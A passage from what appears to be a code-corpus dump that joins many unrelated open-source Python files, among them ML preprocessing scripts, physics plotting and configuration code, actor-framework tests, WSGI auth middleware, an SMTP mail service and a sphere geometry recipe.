def save_best(path, best_group, idx):
for fn, _ in best_group:
name = fn.split('/')[-1]
with open(fn, 'rb') as f:
data = f.read().split('\n')[:-1]
with open(os.path.join(path, name), 'wb') as f:
for x in data[:idx*2]:
f.write(x+'\n')
def do_filter(log_path, out_path, n, core):
log_names = list_dir(log_path)
logs = utils.multiproc(loader, log_names, core)
best_group, idx = find_best([logs], n)
save_best(out_path, best_group, idx)
def show_help():
print './filter-log [log dir] [output dir] [# of output log] [# of core]'
if __name__ == '__main__':
if len(sys.argv) !=5:
show_help()
sys.exit(-1)
n = int(sys.argv[3])
core = int(sys.argv[4])
do_filter(sys.argv[1], sys.argv[2], n, core)
|
onnx_tf/handlers/backend/conv_transpose.py | malisit/onnx-tensorflow | 1,110 | 12775016 | from onnx_tf.handlers.backend_handler import BackendHandler
from onnx_tf.handlers.handler import onnx_op
from onnx_tf.handlers.handler import partial_support
from onnx_tf.handlers.handler import ps_description
from .conv_mixin import ConvMixin
@onnx_op("ConvTranspose")
@partial_support(True)
@ps_description("ConvTranspose with dilations != 1, or " +
"transposed convolution for 4D or higher " +
"are not supported in Tensorflow.")
class ConvTranspose(ConvMixin, BackendHandler):
@classmethod
def version_1(cls, node, **kwargs):
return cls.conv(node, kwargs["tensor_dict"], transpose=True)
@classmethod
def version_11(cls, node, **kwargs):
return cls.conv(node, kwargs["tensor_dict"], transpose=True)
|
PWGJE/EMCALJetTasks/Tracks/analysis/test/PlotScaledTriggered.py | maroozm/AliPhysics | 114 | 12775024 | '''
Created on 22.09.2014
@author: markusfasel
'''
from PWGJE.EMCALJetTasks.Tracks.analysis.base.Graphics import SinglePanelPlot, GraphicsObject, Style, Frame
from PWGJE.EMCALJetTasks.Tracks.analysis.correction.TriggeredSpectrumScaler import TriggeredSpectrumScaler
from PWGJE.EMCALJetTasks.Tracks.analysis.correction.SpectrumCombiner import SpectrumCombiner
from ROOT import kRed, kBlack, kBlue
class PlotScaledTriggeredToMinBias(SinglePanelPlot):
'''
classdocs
'''
def __init__(self, minbiasspectrum, triggeredSpectrum):
'''
Constructor
'''
SinglePanelPlot.__init__(self)
self.__minbiasSpectrum = GraphicsObject(minbiasspectrum, Style(kRed,25))
triggeredSpectrumMaker = TriggeredSpectrumScaler(minbiasspectrum, triggeredSpectrum)
self.__triggeredSpectrum = GraphicsObject(triggeredSpectrumMaker.GetScaledTriggeredSpectrum(), Style(kBlue, 24))
combinedSpectrumMaker = SpectrumCombiner(minbiasspectrum, self.__triggeredSpectrum.GetData())
self.__combinedSpectrum = GraphicsObject(combinedSpectrumMaker.MakeCombinedSpectrum(50.), Style(kBlack, 20))
self.__labeltext = None
def SetLabel(self, label):
self.__labeltext = label
def Create(self):
self._OpenCanvas("triggerSpectrumScalerPlot", "Compare scaled trigger to minbias")
pad = self._GetFramedPad()
#pad.GetPad().SetLogx()
pad.GetPad().SetLogy()
frame = Frame("framecomp", 0.1, 100, 1e-10, 2)
frame.SetXtitle("p_{t} (GeV/c)")
frame.SetYtitle("1/N_{ev} dN/dp_{t} ((GeV/c)^{-1})")
pad.DrawFrame(frame)
pad.DrawGraphicsObject(self.__combinedSpectrum, True, "Combined")
pad.DrawGraphicsObject(self.__minbiasSpectrum, True, "MinBias")
pad.DrawGraphicsObject(self.__triggeredSpectrum, True, "Triggered")
pad.CreateLegend(0.55, 0.75, 0.89, 0.89)
if self.__labeltext:
pad.CreateLabel(0.15, 0.15, 0.45, 0.2, self.__labeltext)
|
Chapter14/data_preprocessing.py | andriitugai/Learning-Python-data-structures | 202 | 12775072 |
import numpy as np
import pandas
from sklearn.preprocessing import MinMaxScaler, StandardScaler, Binarizer
#handle the missing values
data = pandas.DataFrame([
[4., 45., 984.],
[np.NAN, np.NAN, 5.],
[94., 23., 55.],
])
#print original data
print(data)
#fill the missing values with the constant 0.1
print(data.fillna(0.1))
#fill the missing values with the mean
print(data.fillna(data.mean()))
#Data normalization
data1 = pandas.DataFrame([[ 58., 1., 43.],
[ 10., 200., 65.],
[ 20. , 75. , 7.]])
#scaling with min-max scaler
scaled_values = MinMaxScaler(feature_range=(0,1))
results = scaled_values.fit(data1).transform(data1)
print(results)
#scaling with the standard scaling
stand_scalar = StandardScaler().fit(data1)
results = stand_scalar.transform(data1)
print(results)
#normalization using binarization
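#Binarizer(50.0) sets the threshold to 50: values above it map to 1, the rest to 0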
results = Binarizer(50.0).fit(data1).transform(data1)
print(results)
|
test/EN.py | miaopei/deep_landmark | 327 | 12775102 | <reponame>miaopei/deep_landmark
#!/usr/bin/env python2.7
# coding: utf-8
"""
This file uses a Caffe model to predict landmarks and evaluate the mean error.
"""
import os, sys
import time
import cv2
import numpy as np
from numpy.linalg import norm
from common import getDataFromTxt, logger, processImage, getCNNs
TXT = 'dataset/train/testImageList.txt'
template = '''################## Summary #####################
Test Number: %d
Time Consume: %.03f s
FPS: %.03f
LEVEL - %d
Mean Error:
Left Eye = %f
Right Eye = %f
Nose = %f
Failure:
Left Eye = %f
Right Eye = %f
Nose = %f
'''
def evaluateError(landmarkGt, landmarkP, bbox):
e = np.zeros(3)
for i in range(3):
e[i] = norm(landmarkGt[i] - landmarkP[i])
e = e / bbox.w
print 'landmarkGt'
print landmarkGt
print 'landmarkP'
print landmarkP
print 'error', e
return e
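# The EN network of level 1 covers only the eyes-and-nose region, which is why the
# forward pass below feeds just the top 31 rows of the 39x39 face patch.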
def EN(img, bbox):
"""
LEVEL-1, EN
img: gray image
bbox: bounding box of face
"""
bbox = bbox.expand(0.05)
face = img[bbox.top:bbox.bottom+1,bbox.left:bbox.right+1]
face = cv2.resize(face, (39, 39)).reshape((1, 1, 39, 39))
face = processImage(face)
F, EN, NM = getCNNs(level=1) # TODO more flexible load needed.
landmark = EN.forward(face[:, :, :31, :])
return landmark
def E():
data = getDataFromTxt(TXT)
error = np.zeros((len(data), 3))
for i in range(len(data)):
imgPath, bbox, landmarkGt = data[i]
landmarkGt = landmarkGt[:3, :]
img = cv2.imread(imgPath, cv2.CV_LOAD_IMAGE_GRAYSCALE)
assert(img is not None)
logger("process %s" % imgPath)
landmarkP = EN(img, bbox)
# real landmark
landmarkP = bbox.reprojectLandmark(landmarkP)
landmarkGt = bbox.reprojectLandmark(landmarkGt)
error[i] = evaluateError(landmarkGt, landmarkP, bbox)
return error
if __name__ == '__main__':
t = time.clock()
error = E()
t = time.clock() - t
N = len(error)
fps = N / t
errorMean = error.mean(0)
# failure
failure = np.zeros(3)
threshold = 0.05
for i in range(3):
failure[i] = float(sum(error[:, i] > threshold)) / N
# log string
s = template % (N, t, fps, 1, errorMean[0], errorMean[1], errorMean[2], \
failure[0], failure[1], failure[2])
print s
logfile = 'log/1_EN_test.log'
with open(logfile, 'w') as fd:
fd.write(s)
|
mistral/scheduler/scheduler_server.py | soda-research/mistral | 205 | 12775116 | <reponame>soda-research/mistral
# Copyright 2018 - Nokia Networks.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from oslo_log import log as logging
from mistral.rpc import base as rpc
from mistral.service import base as service_base
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class SchedulerServer(service_base.MistralService):
"""Scheduler server.
Manages scheduler life-cycle and gets registered as an RPC
endpoint to process scheduler specific calls.
"""
def __init__(self, scheduler, setup_profiler=True):
super(SchedulerServer, self).__init__(
'scheduler_group',
setup_profiler
)
self.scheduler = scheduler
self._rpc_server = None
def start(self):
super(SchedulerServer, self).start()
self._rpc_server = rpc.get_rpc_server_driver()(cfg.CONF.engine)
self._rpc_server.register_endpoint(self)
self._rpc_server.run()
self._notify_started('Scheduler server started.')
def stop(self, graceful=False):
super(SchedulerServer, self).stop()
if self._rpc_server:
self._rpc_server.stop(graceful)
def schedule(self, rpc_ctx, job):
"""Receives requests over RPC to schedule delayed calls.
:param rpc_ctx: RPC request context.
:param job: Scheduler job.
"""
LOG.info("Received RPC request 'schedule'[job=%s]", job)
return self.scheduler.schedule(job, allow_redistribute=False)
|
migen/fomu.py | Freax13/fomu-workshop | 127 | 12775131 | <filename>migen/fomu.py
""" Fomu board definitions (mapping of I/O pins, clock, etc.) """
from migen import *
from migen.build.generic_platform import *
from migen.build.lattice import LatticePlatform
class FomuPvtPlatform(LatticePlatform):
""" Based on
https://github.com/litex-hub/litex-boards/blob/master/litex_boards/partner/platforms/fomu_pvt.py """
_io = [
('clk48', 0, Pins('F4'), IOStandard('LVCMOS33')),
('user_led_n', 0, Pins('A5'), IOStandard('LVCMOS33')),
('rgb_led', 0,
Subsignal('r', Pins('C5')),
Subsignal('g', Pins('B5')),
Subsignal('b', Pins('A5')),
IOStandard('LVCMOS33')),
('user_touch_n', 0, Pins('E4'), IOStandard('LVCMOS33')),
('user_touch_n', 1, Pins('D5'), IOStandard('LVCMOS33')),
('user_touch_n', 2, Pins('E5'), IOStandard('LVCMOS33')),
('user_touch_n', 3, Pins('F5'), IOStandard('LVCMOS33')),
('usb', 0,
Subsignal('d_p', Pins('A1')),
Subsignal('d_n', Pins('A2')),
Subsignal('pullup', Pins('A4')),
IOStandard('LVCMOS33'))
]
_connectors = [
('touch_pins', 'E4 D5 E5 F5')
]
default_clk_name = 'clk48'
default_clk_period = 1e9 / 48e6
def __init__(self):
LatticePlatform.__init__(self,
'ice40-up5k-uwg30',
self._io,
self._connectors,
toolchain='icestorm')
def create_programmer(self):
return IceStormProgrammer()
class FomuHackerPlatform(LatticePlatform):
""" Based on
https://github.com/litex-hub/litex-boards/blob/master/litex_boards/partner/platforms/fomu_hacker.py """
_io = [
('clk48', 0, Pins('F5'), IOStandard('LVCMOS33')),
('user_led_n', 0, Pins('A5'), IOStandard('LVCMOS33')),
('rgb_led', 0,
Subsignal('r', Pins('C5')),
Subsignal('g', Pins('B5')),
Subsignal('b', Pins('A5')),
IOStandard('LVCMOS33')),
('user_touch_n', 0, Pins('F4'), IOStandard('LVCMOS33')),
('user_touch_n', 1, Pins('E5'), IOStandard('LVCMOS33')),
('user_touch_n', 2, Pins('E4'), IOStandard('LVCMOS33')),
('user_touch_n', 3, Pins('F2'), IOStandard('LVCMOS33')),
('usb', 0,
Subsignal('d_p', Pins('A4')),
Subsignal('d_n', Pins('A2')),
Subsignal('pullup', Pins('D5')),
IOStandard('LVCMOS33'))
]
_connectors = [
('touch_pins', 'F4 E5 E4 F2')
]
default_clk_name = 'clk48'
default_clk_period = 1e9 / 48e6
def __init__(self):
LatticePlatform.__init__(self,
'ice40-up5k-uwg30',
self._io,
self._connectors,
toolchain='icestorm')
def create_programmer(self):
return IceStormProgrammer()
class FomuEvt2Platform(LatticePlatform):
""" Based on
https://github.com/litex-hub/litex-boards/blob/master/litex_boards/partner/platforms/fomu_evt.py """
_io = [
('clk48', 0, Pins('44'), IOStandard('LVCMOS33')),
('user_led_n', 0, Pins('41'), IOStandard('LVCMOS33')),
('rgb_led', 0,
Subsignal('r', Pins('40')),
Subsignal('g', Pins('39')),
Subsignal('b', Pins('41')),
IOStandard('LVCMOS33')),
('user_touch_n', 0, Pins('48'), IOStandard('LVCMOS33')),
('user_touch_n', 1, Pins('47'), IOStandard('LVCMOS33')),
('user_touch_n', 2, Pins('46'), IOStandard('LVCMOS33')),
('user_touch_n', 3, Pins('45'), IOStandard('LVCMOS33')),
('usb', 0,
Subsignal('d_p', Pins('34')),
Subsignal('d_n', Pins('37')),
Subsignal('pullup', Pins('35')),
Subsignal('pulldown', Pins('36')),
IOStandard('LVCMOS33'))
]
_connectors = [
('touch_pins', '48 47 46 45')
]
default_clk_name = 'clk48'
default_clk_period = 1e9 / 48e6
def __init__(self):
LatticePlatform.__init__(self,
'ice40-up5k-sg48',
self._io,
self._connectors,
toolchain='icestorm')
def create_programmer(self):
return IceStormProgrammer()
FomuEvt3Platform = FomuEvt2Platform
|
tests/proxy/test_proxy.py | jodal/pykka | 796 | 12775151 | <filename>tests/proxy/test_proxy.py
import pytest
import pykka
from pykka import ActorDeadError, ActorProxy
class NestedObject:
pass
@pytest.fixture(scope="module")
def actor_class(runtime):
class ActorForProxying(runtime.actor_class):
a_nested_object = pykka.traversable(NestedObject())
a_class_attr = "class_attr"
def __init__(self):
super(runtime.actor_class, self).__init__()
self.an_instance_attr = "an_instance_attr"
def a_method(self):
pass
return ActorForProxying
@pytest.fixture
def proxy(actor_class):
proxy = ActorProxy(actor_class.start())
yield proxy
proxy.stop()
def test_eq_to_self(proxy):
assert proxy == proxy
def test_is_hashable(proxy):
assert hash(proxy) == hash(proxy)
def test_eq_to_another_proxy_for_same_actor_and_attr_path(proxy):
proxy2 = proxy.actor_ref.proxy()
assert proxy == proxy2
def test_not_eq_to_proxy_with_different_attr_path(proxy):
assert proxy != proxy.a_nested_object
def test_repr_is_wrapped_in_lt_and_gt(proxy):
result = repr(proxy)
assert result.startswith("<")
assert result.endswith(">")
def test_repr_reveals_that_this_is_a_proxy(proxy):
assert "ActorProxy" in repr(proxy)
def test_repr_contains_actor_class_name(proxy):
assert "ActorForProxying" in repr(proxy)
def test_repr_contains_actor_urn(proxy):
assert proxy.actor_ref.actor_urn in repr(proxy)
def test_repr_contains_attr_path(proxy):
assert "a_nested_object" in repr(proxy.a_nested_object)
def test_str_contains_actor_class_name(proxy):
assert "ActorForProxying" in str(proxy)
def test_str_contains_actor_urn(proxy):
assert proxy.actor_ref.actor_urn in str(proxy)
def test_dir_on_proxy_lists_attributes_of_the_actor(proxy):
result = dir(proxy)
assert "a_class_attr" in result
assert "an_instance_attr" in result
assert "a_method" in result
def test_dir_on_proxy_lists_private_attributes_of_the_proxy(proxy):
result = dir(proxy)
assert "__class__" in result
assert "__dict__" in result
assert "__getattr__" in result
assert "__setattr__" in result
def test_refs_proxy_method_returns_a_proxy(actor_class):
proxy_from_ref_proxy = actor_class.start().proxy()
assert isinstance(proxy_from_ref_proxy, ActorProxy)
proxy_from_ref_proxy.stop().get()
def test_proxy_constructor_raises_exception_if_actor_is_dead(actor_class):
actor_ref = actor_class.start()
actor_ref.stop()
with pytest.raises(ActorDeadError) as exc_info:
ActorProxy(actor_ref)
assert str(exc_info.value) == f"{actor_ref} not found"
def test_actor_ref_may_be_retrieved_from_proxy_if_actor_is_dead(proxy):
proxy.actor_ref.stop()
assert not proxy.actor_ref.is_alive()
def test_actor_proxy_does_not_expose_proxy_to_self(runtime, log_handler):
class Actor(runtime.actor_class):
def __init__(self):
super().__init__()
self.self_proxy = self.actor_ref.proxy()
self.foo = "bar"
actor_ref = Actor.start()
try:
proxy = actor_ref.proxy()
assert proxy.foo.get() == "bar"
with pytest.raises(AttributeError, match="has no attribute 'self_proxy'"):
proxy.self_proxy.foo.get()
finally:
actor_ref.stop()
log_handler.wait_for_message("warning")
with log_handler.lock:
assert len(log_handler.messages["warning"]) == 2
log_record = log_handler.messages["warning"][0]
assert (
"attribute 'self_proxy' is a proxy to itself. "
"Consider making it private by renaming it to '_self_proxy'."
) in log_record.getMessage()
|
third_party/Paste/paste/auth/multi.py | tingshao/catapult | 5,079 | 12775162 | # (c) 2005 <NAME>
# This module is part of the Python Paste Project and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
# This code was written with funding by http://prometheusresearch.com
"""
Authentication via Multiple Methods
In some environments, the choice of authentication method to be used
depends upon the environment and is not "fixed". This middleware allows
N authentication methods to be registered along with a goodness function
which determines which method should be used. The following example
demonstrates how to use both form and digest authentication in a server
stack; by default it uses form-based authentication unless
``*authmeth=digest`` is specified as a query argument.
>>> from paste.auth import form, cookie, digest, multi
>>> from paste.wsgilib import dump_environ
>>> from paste.httpserver import serve
>>>
>>> multi = multi.MultiHandler(dump_environ)
>>> def authfunc(environ, realm, user):
... return digest.digest_password(realm, user, user)
>>> multi.add_method('digest', digest.middleware, "Test Realm", authfunc)
>>> multi.set_query_argument('digest')
>>>
>>> def authfunc(environ, username, password):
... return username == password
>>> multi.add_method('form', form.middleware, authfunc)
>>> multi.set_default('form')
>>> serve(cookie.middleware(multi))
serving on...
"""
class MultiHandler(object):
"""
Multiple Authentication Handler
    This middleware provides two orthogonal facilities:
- a manner to register any number of authentication middlewares
- a mechanism to register predicates which cause one of the
registered middlewares to be used depending upon the request
If none of the predicates returns True, then the application is
invoked directly without middleware
"""
def __init__(self, application):
self.application = application
self.default = application
self.binding = {}
self.predicate = []
def add_method(self, name, factory, *args, **kwargs):
self.binding[name] = factory(self.application, *args, **kwargs)
def add_predicate(self, name, checker):
self.predicate.append((checker, self.binding[name]))
def set_default(self, name):
""" set default authentication method """
self.default = self.binding[name]
def set_query_argument(self, name, key = '*authmeth', value = None):
""" choose authentication method based on a query argument """
lookfor = "%s=%s" % (key, value or name)
self.add_predicate(name,
lambda environ: lookfor in environ.get('QUERY_STRING',''))
def __call__(self, environ, start_response):
for (checker, binding) in self.predicate:
if checker(environ):
return binding(environ, start_response)
return self.default(environ, start_response)
middleware = MultiHandler
__all__ = ['MultiHandler']
if "__main__" == __name__:
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS)
|
src/pipelinex/extras/ops/allennlp_ops.py | MarchRaBBiT/pipelinex | 188 | 12775174 | class AllennlpReaderToDict:
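    # Callable op: runs the wrapped AllenNLP reader on file_path and returns a dict
    # mapping row index to instance.fields, truncated to n_samples when given.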
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, *args_ignore, **kwargs_ignore):
kwargs = self.kwargs
reader = kwargs.get("reader")
file_path = kwargs.get("file_path")
n_samples = kwargs.get("n_samples")
instances = reader._read(file_path)
n_samples = n_samples or len(instances)
d = dict()
i = 0
for instance in instances:
if n_samples and i >= n_samples:
break
d[i] = instance.fields
i += 1
return d
|
L1Trigger/TrackTrigger/python/TTStubAlgorithmRegister_cfi.py | ckamtsikis/cmssw | 852 | 12775177 | import FWCore.ParameterSet.Config as cms
# First register all the hit matching algorithms, then specify preferred ones at end.
# The stub windows used have been optimized for PU200 events
# We use by default the tight tuning
#
# Definition is presented here:
#
# https://indico.cern.ch/event/681577/#4-update-of-the-track-trigger
#
# This script is adapted to the very last Tilted Tracker geometry to date (tracker T5)
# This version was tested on CMSSW 10_0_0_pre1
#
TTStubAlgorithm_official_Phase2TrackerDigi_ = cms.ESProducer("TTStubAlgorithm_official_Phase2TrackerDigi_",
zMatchingPS = cms.bool(True),
zMatching2S = cms.bool(True),
#Number of tilted rings per side in barrel layers (for tilted geom only)
NTiltedRings = cms.vdouble( 0., 12., 12., 12., 0., 0., 0.),
# PU200 tight tuning, optimized for muons
BarrelCut = cms.vdouble( 0, 2, 2.5, 3.5, 4.5, 5.5, 7),
TiltedBarrelCutSet = cms.VPSet(
cms.PSet( TiltedCut = cms.vdouble( 0 ) ),
cms.PSet( TiltedCut = cms.vdouble( 0, 3, 3, 2.5, 3, 3, 2.5, 2.5, 2, 1.5, 1.5, 1, 1) ),
cms.PSet( TiltedCut = cms.vdouble( 0, 3.5, 3, 3, 3, 3, 2.5, 2.5, 3, 3, 2.5, 2.5, 2.5) ),
cms.PSet( TiltedCut = cms.vdouble( 0, 4, 4, 4, 3.5, 3.5, 3.5, 3.5, 3, 3, 3, 3, 3) ),
),
EndcapCutSet = cms.VPSet(
cms.PSet( EndcapCut = cms.vdouble( 0 ) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 1, 2.5, 2.5, 3, 2.5, 3, 3.5, 4, 4, 4.5, 3.5, 4, 4.5, 5, 5.5) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 0.5, 2.5, 2.5, 3, 2.5, 3, 3, 3.5, 3.5, 4, 3.5, 3.5, 4, 4.5, 5) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 1, 3, 3, 2.5, 3.5, 3.5, 3.5, 4, 3.5, 3.5, 4, 4.5) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 1, 2.5, 3, 2.5, 3.5, 3, 3, 3.5, 3.5, 3.5, 4, 4) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 0.5, 1.5, 3, 2.5, 3.5, 3, 3, 3.5, 4, 3.5, 4, 3.5) ),
)
# PU200 loose tuning, optimized for robustness (uncomment if you want to use it)
#BarrelCut = cms.vdouble( 0, 2.0, 3, 4.5, 6, 6.5, 7.0),
#TiltedBarrelCutSet = cms.VPSet(
# cms.PSet( TiltedCut = cms.vdouble( 0 ) ),
# cms.PSet( TiltedCut = cms.vdouble( 0, 3, 3., 2.5, 3., 3., 2.5, 2.5, 2., 1.5, 1.5, 1, 1) ),
# cms.PSet( TiltedCut = cms.vdouble( 0, 4., 4, 4, 4, 4., 4., 4.5, 5, 4., 3.5, 3.5, 3) ),
# cms.PSet( TiltedCut = cms.vdouble( 0, 5, 5, 5, 5, 5, 5, 5.5, 5, 5, 5.5, 5.5, 5.5) ),
# ),
#EndcapCutSet = cms.VPSet(
# cms.PSet( EndcapCut = cms.vdouble( 0 ) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 1., 2.5, 2.5, 3.5, 5.5, 5.5, 6, 6.5, 6.5, 6.5, 6.5, 6.5, 6.5, 7, 7) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 0.5, 2.5, 2.5, 3, 5, 6, 6, 6.5, 6.5, 6.5, 6.5, 6.5, 6.5, 7, 7) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 1, 3., 4.5, 6., 6.5, 6.5, 6.5, 7, 7, 7, 7, 7) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 1., 2.5, 3.5, 6., 6.5, 6.5, 6.5, 6.5, 7, 7, 7, 7) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 0.5, 1.5, 3., 4.5, 6.5, 6.5, 7, 7, 7, 7, 7, 7) ),
# )
)
# CBC3 hit matching algorithm
TTStubAlgorithm_cbc3_Phase2TrackerDigi_ = cms.ESProducer("TTStubAlgorithm_cbc3_Phase2TrackerDigi_",
zMatchingPS = cms.bool(True),
zMatching2S = cms.bool(True),
)
# Set the preferred hit matching algorithms.
# We prefer the global geometry algorithm for now in order not to break
# anything. Override with process.TTStubAlgorithm_PSimHit_ = ...,
# etc. in your configuration.
TTStubAlgorithm_Phase2TrackerDigi_ = cms.ESPrefer("TTStubAlgorithm_official_Phase2TrackerDigi_")
|
recipes/Python/577491_Observer_Design_Pattern_pythgevent_coroutine/recipe-577491.py | tdiprima/code | 2,023 | 12775188 | __author__ = "<NAME>"
__email__ = "<EMAIL>"
import gevent
from gevent import core
from gevent.hub import getcurrent
from gevent.event import Event
from gevent.pool import Pool
import functools
def wrap(method, *args, **kargs):
if method is None:
return None
if args or kargs:
method = functools.partial(method, *args, **kargs)
def wrapper(*args, **kargs):
return method(*args, **kargs)
return wrapper
class FiredEvent(Exception):
pass
class Event(object):
def __init__(self,events,name,callback):
self.events = events
self.name = name.lower()
self.callback = callback
def unsubscribe(self):
if not self.events._events.has_key(self.name):
return False
try:
del self.events._events[self.name][self.events._events[self.name].index(self)]
except:
pass
return True
def cancel(self):
self.unsubscribe()
def run(self):
gevent.spawn(self.callback)
def __del__(self):
self.unsubscribe()
class Observer(object):
def __new__(cls,*args):
if not hasattr(cls,'_instance'):
cls._instance = object.__new__(cls)
cls._instance._events = {}
return cls._instance
def subscribe(self,name,callback):
if not self._events.has_key(name.lower()):
self._events[name] = []
ev = Event(self,name,callback)
self._events[name].append(ev)
return ev
def fire(self,name):
try:
ev = self._events[name.lower()].pop(0)
except:
return False
while ev:
gevent.spawn(ev.run)
try:
ev = self._events[name.lower()].pop(0)
except:
break
return True
def wait(self,name):
if not self._events.has_key(name.lower()):
self._events[name] = []
ev = Event(self,name,wrap(getcurrent().throw,FiredEvent))
self._events[name].append(ev)
return ev
if __name__ == '__main__':
# Testing
def in_another_greenlet():
print '001',getcurrent()
def test_subscribe():
e = Observer()
print '000',getcurrent()
getcurrent().in_another_greenlet = in_another_greenlet
b = e.subscribe('kill',getcurrent().in_another_greenlet)
gevent.sleep(5)
print 'END'
b.unsubscribe()
def test_wait():
e = Observer()
ev = e.wait('kill')
try:
gevent.sleep(3)
except FiredEvent:
print 'Fired!'
else:
print 'Not Fired!'
finally:
ev.cancel()
def fire_event():
e2 = Observer()
gevent.sleep(2)
e2.fire('kill')
p = Pool()
p.spawn(test_wait)
p.spawn(test_subscribe)
p.spawn(fire_event)
p.join()
|
canopen/sdo/__init__.py | mlederhi/canopen | 301 | 12775189 | <gh_stars>100-1000
from .base import Variable, Record, Array
from .client import SdoClient
from .server import SdoServer
from .exceptions import SdoAbortedError, SdoCommunicationError
|
kansha/services/mail.py | AnomalistDesignLLC/kansha | 161 | 12775215 | <gh_stars>100-1000
# -*- coding:utf-8 -*-
#--
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
#--
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.Utils import COMMASPACE, formatdate
from nagare import log
from .services_repository import Service
class MailSender(Service):
'''
Mail sender service.
API.
A mail sender service must provide a send method:
'''
LOAD_PRIORITY = 10
CONFIG_SPEC = {
'activated': 'boolean(default=True)',
'host': 'string(default="127.0.0.1")',
'port': 'integer(default=25)',
'default_sender': 'string(default="<EMAIL>")'
}
def __init__(self, config_filename, error, host, port, default_sender, activated):
super(MailSender, self).__init__(config_filename, error)
self.host = host
self.port = port
self.default_sender = default_sender
self.activated = activated
if self.activated:
log.debug(
'The mail service will connect to %s on port %s' %
(self.host, self.port)
)
else:
log.warning('The mail service will drop all messages!')
def _smtp_send(self, from_, to, contents):
try:
smtp = smtplib.SMTP(self.host, self.port)
except IOError as e:
log.exception(e)
return False
try:
smtp.sendmail(from_, to, contents)
except Exception as e:
log.exception(e)
return False
finally:
smtp.close()
return True
def send(self, subject, to, content, html_content=None, from_='', cc=[], bcc=[],
type='plain', mpart_type='alternative'):
"""Sends an email
In:
- ``subject`` -- email subject
- ``to`` -- list of recipients' emails
- ``content`` -- email content
- ``from_`` -- email sender adress
- ``cc`` -- list of CC emails
- ``bcc`` -- list of BCC emails
- ``type`` -- email type ('plain' or 'html')
- ``mpart_type`` -- email part type
"""
from_ = from_ if from_ else self.default_sender
# create the message envelop
msg = MIMEMultipart(mpart_type)
msg['Subject'] = subject
msg['Date'] = formatdate(localtime=True)
msg['From'] = from_
msg['To'] = COMMASPACE.join(to)
if cc:
msg['Cc'] = COMMASPACE.join(cc)
# attach the mail content
charset = 'us-ascii'
if isinstance(content, unicode):
content = content.encode('UTF-8')
charset = 'UTF-8'
msg.attach(MIMEText(content, type, charset))
if html_content:
msg.attach(MIMEText(html_content, 'html', charset))
# log
log.info('%s mail:\n subject=%s\n from=%s\n to=%s\n cc=%s\n bcc=%s',
'sending' if self.activated else 'ignoring', subject, from_, to, cc, bcc)
log.debug('Mail content:\n' + content)
# post the email to the SMTP server
if self.activated:
return self._smtp_send(from_, to + cc + bcc, msg.as_string())
return True
class DummyMailSender(MailSender):
'''For use in unit tests.'''
def __init__(self):
super(DummyMailSender, self).__init__(
'',
None,
host='localhost',
port=25,
activated=False,
default_sender='<EMAIL>'
)
|
tests/components/opnsense/__init__.py | domwillcode/home-assistant | 30,023 | 12775241 | """Tests for the opnsense component."""
|
recipes/Python/577218_Sphere/recipe-577218.py | tdiprima/code | 2,023 | 12775243 | <gh_stars>1000+
#On the name of ALLAH and may the blessing and peace of Allah
#be upon the Messenger of Allah <NAME>.
#Author : <NAME>
#Date : 06/05/10
#version :2.6
"""
The Sphere class represents a geometric sphere. A completing_the_squares
method rewrites the general equation by completing the squares, while a
utility _checkSign method checks the sign of a coefficient and returns an
empty string for a positive number and a minus character for a negative one.
A string representation method prints the solution of the sphere equation
for the three possible outcomes (sphere, single point, or no graph).
"""
from math import sqrt
class Sphere(object):
"""
class that represents a geometric Sphere
"""
def __init__(self,coef_A = 0,coef_B = 0, coef_C = 0, coef_D= 0, coef_E = 0, coef_F = 0, coef_G = 0):
""" Sphere Construction takes coef_A,coef_B,coef_C,coef_D,coef_E,coef_F,coef_G constants """
self._A = coef_A
self._B = coef_B
self._C = coef_C
self._D = coef_D
self._E = coef_E
self._F = coef_F
self._G = coef_G
self._a = self._checkSign(self._D)
self._b = self._checkSign(self._E)
self._c = self._checkSign(self._F)
self._d = pow((self._D/2.0)/self._A,2)
self._e = pow((self._E/2.0)/self._B,2)
self._f = pow((self._F/2.0)/self._C,2)
self._g = chr(253)
self._h = (-self._G/self._A + self._d + self._e + self._f)
def _checkSign(self,value):
""" Utility method to check the values' sign
and return a sign string"""
if value >= 0:
return "+"
else :
return ""
def completing_the_squares(self):
"""
completing the squares function
"""
c_squares = "(x%s %s%sx + %s) + (y%s %s%sy + %s) + (z%s %s%sz + %s) = %s" % \
(self._g,self._a,self._D/self._A,self._d,
self._g,self._b,self._E/self._B,self._e,
self._g,self._c,self._F/self._C,self._f,self._h)
return c_squares
def __str__(self):
"""
String representation of a sphere
"""
print ("\n(x%s%s)%s + (y%s%s)%s + (z%s%s)%s = %s") % \
(self._a,(self._D/2.0)/self._A,self._g,self._b,(self._E/2.0)/self._B,
self._g,self._c,(self._F/2.0)/self._C,self._g,self._h)
if self._h > 0:
return "\n<The graph of this equation is a sphere with centre (%s,%s,%s) and radius %s\n" % \
(-1*self._D/2.0,-1*self._E/2.0,-1*self._F/2.0,"%2.3f" % (sqrt(self._h)))
elif self._h == 0:
return "\n<this sphere has radius = 0 and the graph is a single point(%s,%s,%s)\n " % \
